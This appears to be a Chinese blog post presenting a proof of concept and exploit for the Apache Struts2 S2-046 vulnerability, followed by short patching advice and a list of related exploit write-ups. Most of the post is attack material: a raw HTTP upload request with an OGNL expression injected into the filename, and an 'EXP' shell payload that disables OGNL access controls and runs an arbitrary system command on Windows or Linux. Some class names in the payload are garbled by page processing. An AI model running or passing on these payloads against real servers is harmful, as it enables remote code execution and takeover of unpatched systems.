S2-046 POC&EXP

最新推荐文章于 2024-04-26 09:33:44 发布
最新推荐文章于 2024-04-26 09:33:44 发布
阅读量233 收藏
点赞数
文章标签: apache mysql java zookeeper wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486719
版权

S2-046与S2-045漏洞属于同一类型,如果在之前S2-045漏洞曝光后用户已经升级过官方补丁,这次就不受影响。

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 1000000000
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/doUpload
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close

------WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain


foo
------WebKitFormBoundaryXd004BVJN9pBYBL2--

EXP

payload=$(echo "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}")

修复建议

  1. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。
  2. 如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。

官网公告

https://cwiki.apache.org/confluence/display/WW/S2-046

KEY0NE
关注
【漏洞复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 534
描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。......
【漏洞复现】Struts2 S2-062 (CVE-2021-31805) 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-15 3492
文章目录声明前言一、漏洞描述二、漏洞原理三、影响版本四、安全版本五、漏洞细节分析六、本地复现七、漏洞修复 声明 本篇文章仅用于技术研究和漏洞复现,切勿从事非法渗透,造成任何影响与本作者无关,切记! 前言 Apache 官方发布了 Apache Struts2 的风险通告,漏洞编号为 CVE-2021-31805,可能会导致远程代码执行。 一、漏洞描述 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 如果开发人员使用%{…}
struts2批量扫描s2-005-----s2-046
06-13
自动化扫描大量网站是否存在s2-005-----s2-046
linux struts2漏洞,重大漏洞预警:Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)
weixin_39612677的博客
05-16 474
背景介绍近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞。Struts2的使用范围及其广泛,国内外均有大量厂商使用该框架。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立...
Struts2漏洞之S2-046漏洞复现学习
m0_64777251的博客
04-16 2157
养成好习惯复现完及时关掉。
struts2/s2-046漏洞复现
weixin_44253823的博客
11-19 3177
漏洞环境采用vulhub下struts2/s2-046。 搭建好环境后访问youip:8080 点击Submit的同时打开burpsuite抓包工具。 发送到Repeater模块,在filename中插入下列POC代码。 %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('...
S2-046 远程代码执行漏洞(CVE-2017-5638)
Stephen Wolf
11-05 4207
一、S2-046 远程代码执行漏洞(CVE-2017-5638) 漏洞简介 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响版本: Strut...
CVE-2019-0230:CVE-2019-0230和S2-059 POC
03-10
CVE-2019-0230 CVE-2019-0230和s2-059 poc
Struts2-S2-061远程命令执行(CVE-2020-17530)漏洞复现
qq_57172130的博客
05-03 727
目录 框架介绍 漏洞原理 影响版本 环境搭建 漏洞探测 漏洞利用 防御措施 框架介绍 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。Struts 2是Struts 1的一个升级版,但是它和Struts 1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts 2的控制功能就相当于MVC中的Controll
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
最新发布
zz12345600354的博客
04-26 761
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
04-26
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apach e.struts/struts2-spring-plugin/2.3.32
K8_Struts2_EXP S2-045 & 任意文件上传 20170310
09-15
K8_Struts2_EXP S2-045 & 任意文件上传 20170310,无密码,2017版,最新版
struts2 漏洞CVE-2017-5638 S2-046 注意后面的编号不一样 绿盟科技发布威胁预警通告...
weixin_34019929的博客
09-01 389
3月8日,安全加报道struts2 漏洞分析与防护方案 CVE-2017-5638 S2-045,今天又爆出一个漏洞。不过不用惊慌,这个漏洞跟前两天的s2-045漏洞的CVE编号(CVE-2017-5638)是一样的,只是攻击利用时候的攻击字段发生了改变。如果已经按照s2-045漏洞的升级要求升级到2.3.32或者2.5.10.1的话,就不受影响了。...
Apache Struts2S2-046)漏洞预警
热门推荐
煜铭2011
03-21 1万+
0x00 前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Contro
Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
weixin_34174105的博客
04-12 1369
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21:增加S2-046,官方发布S2-046S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、 2017-03-07: 增加安恒信息研究...
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3966
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
struts2 s2-045漏洞利用poc
isinstance的博客
03-10 6824
直接上代码了亲测有用 第一个是检测有没有这个漏洞的 import requestsimport sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
Python 3 Web安全检测框架:PoC&&EXP实现与实践
资源摘要信息:"本资源是一套基于Python编写的Web安全检测PoCEXP框架,包含源码、开发文档以及代码解析,适用于毕业设计、课程设计和项目开发。该框架的目标是在Python 3环境下创建一个与tangscan和Pocsuite类似,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值